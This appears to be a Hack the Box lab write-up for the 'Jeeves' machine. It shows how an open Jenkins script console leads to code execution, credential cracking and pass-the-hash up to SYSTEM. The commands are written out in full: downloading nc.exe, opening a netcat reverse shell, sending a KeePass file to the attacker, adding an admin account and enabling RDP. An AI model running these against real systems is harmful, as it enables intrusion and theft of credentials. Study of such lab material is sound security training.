{Hack the Box} \\ Jeeves Write-Up

Three cheers for corporate malware.

The year is 2005. Avatar: The Last Airbender has just started airing. The sweet melody of asphyxiating cows plays in the background as you try to start your dial-up connection. Obi Wan gets the high ground, but Palpatine gets the last laugh. Ask Jeeves had a special place in our hearts. Glory days.

I shall wax nostalgic no longer. In the words of Nicko, let’s get stuck into this bad boy.

Initial Scans

POOOOOORT SCAN.

root@kali:~# nmap -sC -sV -o nmap.log 10.10.10.63
Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-23 16:32 EDT
Nmap scan report for 10.10.10.63
Host is up (0.043s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4h58m52s, deviation: 0s, median: 4h58m52s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-05-23 21:31:56
|_ start_date: 2018-05-21 00:40:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.33 seconds

Put on a full port scan in the background too. Good habit to get used to. We’ve got two HTTP ports and some SMB going on here. ALSO WE’RE DEALING WITH WINDOWS. Hyperventilate at your leisure.

We can try visiting both HTTP ports to see what we get. Start with port 80.

Dear Lord.

Wow. Flashbacks to when Norton Antivirus sneakily installed Ask Jeeves and Internet Explorer 6 vomited toolbars. *shudder*.

Check out the source code.

<!DOCTYPE html>
<html>
<head>
<title>Ask Jeeves</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<form class="form-wrapper cf" action="error.html">
<div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
<input type="text" placeholder="Search here..." required>
<button type="submit">Search</button>
<div class="byline-bot">Skins</div>
</form>
</body>

</html>

Seems like we’ve been had. Your world is a lie. They’re all dummy links. And the search bar directs us to error.html every time.

This screenshot (assuming it’s legit) actually tells us a lot about the target machine. The Windows version and build number, ASP.NET version, SQL server version, and you get the idea.

In any penetration test, knowing the version numbers of a bunch of different software for a target machine is incredibly valuable. You can use it to look up any existing vulnerabilities or potential misconfigurations. DuckDuckGo is your friend. Google is evil now so it’s an unwilling accomplice at best.

Right now though, we can’t really use any of this information since we don’t have any related open ports. Once we get some kind of user access to Jeeves though, we might need this information, so jot it down somewhere.

Port 50000 doesn’t have much to show for itself either.

We do get another piece of info though, the web server type and version. A quick Google (*ahem* DDG) search for Jetty doesn’t really give us any juicy exploits, so we’ll table it for now, and come back to it if we get really stuck later.

This is where I start throwing dictionaries.

Let’s set up a couple Gobuster sessions on the two HTTP ports (80, 50000) so we can maybe find some tasty directories, and while they marinate, we can go ahead and mess around with SMB a bit.

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.63

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.63/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.63:50000
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.63:50000/
[+] Threads : 200
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================

The Server Message Block (SMB) protocol is a way to access shared files and printers and stuff on another network node. Usually used on Windows, but Unix systems have their own implementation (Samba). Kali has a few good tools installed to enumerate and interact with SMB ports.

smbclient is useful if you need to list the shares available to you, along with user access permissions, and then actually accessing files. But before doing all that, we can use a handy script called enum4linux to give us a detailed overview. This also lets us know if we can access any accounts in the first place. I’ll save you the trouble here and say that this seems like a dead end.

root@kali:~# enum4linux -a 10.10.10.63
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 23 18:46:19 2018
========================== 
| Target Information |
==========================
Target ........... 10.10.10.63
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=================================================== 
| Enumerating Workgroup/Domain on 10.10.10.63 |
===================================================
[E] Can't find workgroup/domain
=========================================== 
| Nbtstat Information for 10.10.10.63 |
===========================================
Looking up status of 10.10.10.63
No reply from 10.10.10.63
==================================== 
| Session Check on 10.10.10.63 |
====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

Oh well.

Back to Gobuster. Port 80 doesn’t really have anything interesting, but if we look at port 50000, we get something funny.

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.63:50000
Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.63:50000/
[+] Threads : 200
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/askjeeves (Status: 302)
=====================================================

Let’s check it out. 302 is a redirect HTTP code in case you haven’t seen it before. Strap yourselves in.

Jenkins? Groovy.

Ask not what Jeeves can do for you.

Not a very eventful ride. The redirect just added a forward slash. Quaint.

BUT OMG, A JENKINS SERVER. And what’s more, we don’t even have to log in. We’ve got full access here. y i k e s.

Look around a bit. Jenkins is an automation server so it’s sure to have some sort of direct access to the underlying machine. If you go to Manage Jenkins option under the top left menu, you’ll see a script console. Looks promising.

Yep.

What a generous host.

Okay. Now you can go spend the next few days learning how to program in Groovy. Fun! Seriously though, it’s just like Java, but easier. If you can Java, you can Groovy. This looks like a tender spot, so let’s try to get some code execution going. It’s Windows, so keep that in mind when you write out commands.

Groovy has a useful method to execute strings as shell commands called execute(). Let’s use that to see if we can get a directory list.

This took a little tinkering to get right, but we’ve got code execution.

Groovy Console:

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Result:

Volume in drive C has no label.
Volume Serial Number is BE50-B1C9

Directory of C:\Users\Administrator\.jenkins

05/21/2018 12:42 AM <DIR> .
05/21/2018 12:42 AM <DIR> ..
05/24/2018 05:26 AM 47 .owner
05/21/2018 12:42 AM 1,684 config.xml
05/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml
11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
11/03/2017 10:33 PM 1,712 identity.key.enc
11/03/2017 10:46 PM 94 jenkins.CLI.xml
05/24/2018 04:54 AM 83,489 jenkins.err.log
11/03/2017 10:47 PM 360,448 jenkins.exe
11/03/2017 10:47 PM 331 jenkins.exe.config
05/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion
11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
12/24/2017 03:38 PM 2,688 jenkins.out.log
05/21/2018 12:41 AM 4 jenkins.pid
11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
11/03/2017 10:47 PM 74,271,222 jenkins.war
05/21/2018 12:41 AM 34,147 jenkins.wrapper.log
11/03/2017 10:49 PM 2,881 jenkins.xml
11/03/2017 10:33 PM <DIR> jobs
11/03/2017 10:33 PM <DIR> logs
05/21/2018 12:42 AM 907 nodeMonitors.xml
11/03/2017 10:33 PM <DIR> nodes
11/03/2017 10:44 PM <DIR> plugins
11/03/2017 10:47 PM 129 queue.xml.bak
11/03/2017 10:33 PM 64 secret.key
11/03/2017 10:33 PM 0 secret.key.not-so-secret
12/24/2017 03:47 AM <DIR> secrets
11/08/2017 09:52 AM <DIR> updates
11/03/2017 10:33 PM <DIR> userContent
11/03/2017 10:33 PM <DIR> users
11/03/2017 10:47 PM <DIR> war
11/03/2017 10:43 PM <DIR> workflow-libs
23 File(s) 74,760,854 bytes
12 Dir(s) 7,523,225,600 bytes free

Excellent.

Now I’d suggest taking a break. Sitting kills, people. Go make fried chicken or something.

Alright, we’re back from our commercial break.

Let’s get a reverse shell. Apparently Jeeves has PowerShell installed so that makes our job easier. Start up a web server on your local machine and put a copy of an nc.exe binary nearby where you won’t lose it.

Along with netcat, Kali has a bunch of other cool Windows binaries for penetration testing stuff in /usr/share/windows-binaries. Look through it when you get the chance. If you don’t have it on your machine, just find it on the internet. The Windows machine we’re targeting is 32-bit so make sure the binary you use is also 32-bit.

root@kali:~# ls -la /usr/share/windows-binaries/
total 1908
drwxr-xr-x 9 root root 4096 Feb 4 14:39 .
drwxr-xr-x 472 root root 20480 May 21 18:24 ..
drwxr-xr-x 2 root root 4096 Feb 4 14:39 backdoors
drwxr-xr-x 2 root root 4096 Feb 4 14:39 enumplus
-rwxr-xr-x 1 root root 53248 Aug 21 2017 exe2bat.exe
drwxr-xr-x 2 root root 4096 Feb 4 14:39 fgdump
drwxr-xr-x 2 root root 4096 Feb 4 14:39 fport
drwxr-xr-x 5 root root 4096 Feb 4 14:39 hyperion
-rwxr-xr-x 1 root root 23552 Aug 21 2017 klogger.exe
drwxr-xr-x 2 root root 4096 Feb 4 14:39 mbenum
drwxr-xr-x 4 root root 4096 Feb 4 14:39 nbtenum
-rwxr-xr-x 1 root root 59392 Aug 21 2017 nc.exe //YEE
-rwxr-xr-x 1 root root 311296 Aug 21 2017 plink.exe
-rwxr-xr-x 1 root root 704512 Aug 21 2017 radmin.exe
-rwxr-xr-x 1 root root 364544 Aug 21 2017 vncviewer.exe
-rwxr-xr-x 1 root root 308736 Aug 21 2017 wget.exe
-rwxr-xr-x 1 root root 66560 Aug 21 2017 whoami.exe

root@kali:~/Documents/oscp/tools/windows_binaries# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Most of the time, netcat use is restricted or nonexistent on Windows machines, so it’s far easier to just upload our own and create TCP connections to our heart’s content.

Back to the Groovy script console. Use the Powershell Invoke-WebRequest cmdlet (wget is so much less verbose, jeez) to grab netcat from your local machine.

Groovy Console:

def process = "powershell -command Invoke-WebRequest 'http://10.10.14.5/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");

Make sure to write your own IP address connected to the tun0 interface (viewable with ifconfig). We need -OutFile to specify that we want to save the file contents to nc.exe because Invoke-WebRequest outputs them to the pipeline by default. Your Python server should show that Jeeves got our present.

root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.63 - - [24/May/2018 01:07:41] "GET /nc.exe HTTP/1.1" 200 -

List the directory contents again to make sure it’s there. We can keep using PowerShell because we want to avoid the aging travesty that is the Windows command line.

Groovy Console:

def process = "powershell -command dir".execute();
println("${process.text}");

Result:

Directory: C:\Users\Administrator\.jenkins


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 10:33 PM jobs
d----- 11/3/2017 10:33 PM logs
d----- 11/3/2017 10:33 PM nodes
d----- 11/3/2017 10:44 PM plugins
d----- 12/24/2017 2:47 AM secrets
d----- 11/8/2017 8:52 AM updates
d----- 11/3/2017 10:33 PM userContent
d----- 11/3/2017 10:33 PM users
d----- 11/3/2017 10:47 PM war
d----- 11/3/2017 10:43 PM workflow-libs
-a---- 5/24/2018 5:26 AM 47 .owner
-a---- 5/21/2018 12:42 AM 1684 config.xml
-a---- 5/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml
-a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
-a---- 11/3/2017 10:33 PM 1712 identity.key.enc
-a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml
5/24/2018 4:54 AM 83489 jenkins.err.log
-a---- 11/3/2017 10:47 PM 360448 jenkins.exe
-a---- 11/3/2017 10:47 PM 331 jenkins.exe.config
-a---- 5/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion
-a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
-a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
12/24/2017 2:38 PM 2688 jenkins.out.log
-a---- 5/21/2018 12:41 AM 4 jenkins.pid
-a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
-a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
-a---- 11/3/2017 10:47 PM 74271222 jenkins.war
-a---- 5/21/2018 12:41 AM 34147 jenkins.wrapper.log
-a---- 11/3/2017 10:49 PM 2881 jenkins.xml
-a---- 5/24/2018 6:06 AM 59392 nc.exe
-a---- 5/21/2018 12:42 AM 907 nodeMonitors.xml
-a---- 11/3/2017 10:47 PM 129 queue.xml.bak
-a---- 11/3/2017 10:33 PM 64 secret.key
-a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret

Great. Now let’s set up a netcat listener on our local machine and connect back to it from the script console.

root@kali:~# nc -lnvp 1337
listening on [any] 1337 ...

Groovy Console:

def process = "powershell -command ./nc.exe 10.10.14.5 1337 -e cmd.exe".execute(); //CHANGE IP PLS
println("${process.text}");

Run it and check your listener.

root@kali:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49678
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
C:\Users\Administrator\.jenkins>

Delicious.

Windows irks me

Start off by invading Kohsuke’s privacy and rifling through his stuff. His Documents folder contains something interesting.

C:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Documents
11/03/2017  11:18 PM    <DIR>          .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 7,523,155,968 bytes free
C:\Users\kohsuke\Documents>

A quick Google (sigh) search show us that the .kdbx extension is most commonly used as a Keepass Password Database data file. Nice. It’s probably got some interesting credentials in there. Let’s get it onto our system with netcat file transfer witchery.

Set up a listener on your local machine that redirects data to a .kdbx file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx
listening on [any] 4444 ...

Now on the command line for Jeeves, use the uploaded nc.exe to transfer the contents of CEH.kdbx to your machine.

C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx
C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx

Your listener should have received the incoming connection. If so, exit netcat and you’ll see the file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49693
^C
root@kali:~# ls -la CEH.kdbx
-rw-r--r-- 1 root root 2846 May 23 02:08 CEH.kdbx
root@kali:~#

Great. Download KeePass if you don’t already have it.

root@kali:~# apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
Password manager
keepass2-doc/kali-rolling 2.38+dfsg-1 all
Password manager - Documentation
keepassx/kali-rolling,now 2.0.3-1 i386 [installed]
Cross Platform Password Manager
keepassxc/kali-rolling 2.3.1+dfsg.1-1 i386
Cross Platform Password Manager
kpcli/kali-rolling 3.1-3 all
command line interface to KeePassX password manager databases
libfile-keepass-perl/kali-rolling 2.03-1 all
interface to KeePass V1 and V2 database files
root@kali:~#apt install keepassx
...

Open the KeePass file.

root@kali:~/Documents/hack_the_box/jeeves# keepassx CEH.kdbx

We shall not pass. We need a password. Let’s smash it.

Luckily Kali saves our asses once again (I laughed when I saw there’s a keepass2john program. I love this).

root@kali:~# keepass2john CEH.kdbx 
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
root@kali:~#

Alright. We now have a hash, and, ignoring the name, we can now use hashcat to crack it. Save the hash to a text file. You’ll notice that the hash is invalid. Check out a list of hash examples to see that KeePass hashes start with $keepass$, and not CEH: (kind of obvious in hindsight). Remove that part. Now actually crack it.

*5 minutes later*

Nvm. It broke my laptop. Pro tip, don’t use the force option when hashcat tells you it’s a bad idea. My Kali Linux partition is no longer booting.

Sigh. Sorry John. I still love you and stuff. Take me back, pls.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/32 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:01:37 DONE (2018-05-26 03:38) 0.01027g/s 564.7p/s 564.7c/s 564.7C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

Aaaand the password is moonshine1. Fire up KeePass again and enter the password.

WOOH, got the password to his Walmart account. I kinda needed a few bags of potting soil and 4-ply toilet paper.

Let’s use winexe to try to log in as admin with all these passwords.

The most promising seems like the one under Backup stuff, which looks like a Windows NTLM hash.

For this, we can use pth-winexe to pass in the hash directly to log in. No need to crack it. Scary stuff.

root@kali:~# pth-winexe 
winexe version 1.1
This program may be freely redistributed under the terms of the GNU GPLv3
Usage: winexe [OPTION]... //HOST COMMAND
Options:
-h, --help Display help message
-V, --version Display version number
-U, --user=[DOMAIN/]USERNAME[%PASSWORD] Set the network username
-A, --authentication-file=FILE Get the credentials from a file
-N, --no-pass Do not ask for a password
-k, --kerberos=STRING Use Kerberos, -k [yes|no]
-d, --debuglevel=DEBUGLEVEL Set debug level
--uninstall Uninstall winexe service after
remote execution
--reinstall Reinstall winexe service before
remote execution
--system Use SYSTEM account
--profile Load user profile
--convert Try to convert characters
between local and remote
code-pages
--runas=[DOMAIN\]USERNAME%PASSWORD Run as the given user (BEWARE:
this password is sent in
cleartext over the network!)
--runas-file=FILE Run as user options defined in a
file
--interactive=0|1 Desktop interaction: 0 -
disallow, 1 - allow. If allow,
also use the --system switch
(Windows requirement). Vista
does not support this option.
--ostype=0|1|2 OS type: 0 - 32-bit, 1 - 64-bit,
2 - winexe will decide.
Determines which version (32-bit
or 64-bit) of service will be
installed.
root@kali:~# pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system <------------ yah
C:\Windows\system32>

Successfully hacked. Now let’s grab the flags the fun way. I had no idea this was a thing until I started my OSCP practice. Mind was sufficiently blown.

Through the Jeeves command line, make an account for yourself with admin privileges (Please don’t do this in a real environment. Use already existing accounts if you have to. And opening up a remote desktop port is pretty conspicuous. It’s just more fun this way).

C:\Windows\system32>net user /add oneeb jeeved
net user /add oneeb jeeved
The command completed successfully.
C:\Windows\system32>net localgroup administrators oneeb /add
net localgroup administrators oneeb /add
The command completed successfully.
C:\Windows\system32>

Now start up the Remote Desktop (RDP) service.

C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
The operation completed successfully.
C:\Windows\system32>

Configure the firewall to let RDP connections in.

C:\Windows\system32>netsh firewall set service remoteadmin enable 
netsh firewall set service remoteadmin enable
Ok.
C:\Windows\system32>netsh firewall set service remotedesktop enable
netsh firewall set service remotedesktop enable
Ok.
C:\Windows\system32>

Now use rdesktop on Kali to log in to your newly minted account.

root@kali:~# rdesktop 10.10.10.63
Connection established using SSL.

Enter your username and password and log in.

The color scheme makes me sad

Tah-dah. Beautiful isn’t it? Play around with it to your heart’s content.

Now go to the admin desktop and grab that flag so I can sleep.

Copy that file to your desktop so you can read it.

Knickers twisted. I’m stumped. Since the root.txt file is always on the Administrator desktop, and there doesn’t seem to be some network inception stuff going on, let’s take a deeper look at the file with PowerShell. Make sure to run it as admin or you're going to have a bad time.

I can use ls again.

Start by taking a look at Alternative Data Streams (ADS). MalwareBytes has a really good basic introduction to it.

Basically ADS is a way for you to add data to a file that’s hidden from normal means of viewing, like through file explorer or printing the file out on a command line. You’ve got to use special directives to view these streams and it’s very easy for them to fly under the radar. They often get a bad rep because so much malware takes advantage of this.

Note that these streams are a feature of the Windows New Technology File System (NTFS), so transferring the file to your Linux system, or even a FAT32 Windows file system will erase any streams the file may have.

Anyway, let’s check to see if hm.txt has any other streams.

Bingo. Read the contents of root.txt.

PS C:\Users\oneeb\Desktop> get-content .\hm.txt -stream root.txt
r00t_ha$h_th1ngi3
PS C:\Users\oneeb\Desktop>

Done.

Just make sure to delete your user account so Jeeves doesn’t axe murder you. Nighty night.

Good times.

This box was a doozy, if only because I hadn’t really done too much Windows hacking before. The OSCP PwK course gave me a good introduction, and banging my head against this box as I surfed the interwebs taught me quite a bit.

Windows privelige escalation throws me for a loop sometimes. The FuzzySecurity guide to Windows priv. esc. really helped me develop a solid attack plan for when I’m stuck with a user account. Be sure to check it out!

If you found this informative, be on the lookout for more write-ups. You can follow me on Twitter for the latest. Shoot me a message if you ever have any questions about how to get started in InfoSec. I’d be glad to help in any way that I can.

Happy hacking!